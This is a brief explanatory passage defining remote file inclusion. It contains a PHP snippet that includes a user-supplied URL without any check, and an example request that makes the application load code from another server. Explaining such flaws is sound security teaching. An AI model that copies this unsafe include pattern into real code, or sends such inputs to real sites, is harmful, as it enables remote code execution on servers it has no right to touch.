What is remote file inclusion?
Remote file inclusion (RFI) is a web vulnerability that lets a malicious hacker force the application to include arbitrary code files imported from another location, for example, a server controlled by the attacker.
<?PHP
$module = $_GET["module"];
include $module;
?>
http://example.com/index.php?module=http://server2.example.com/welcome.php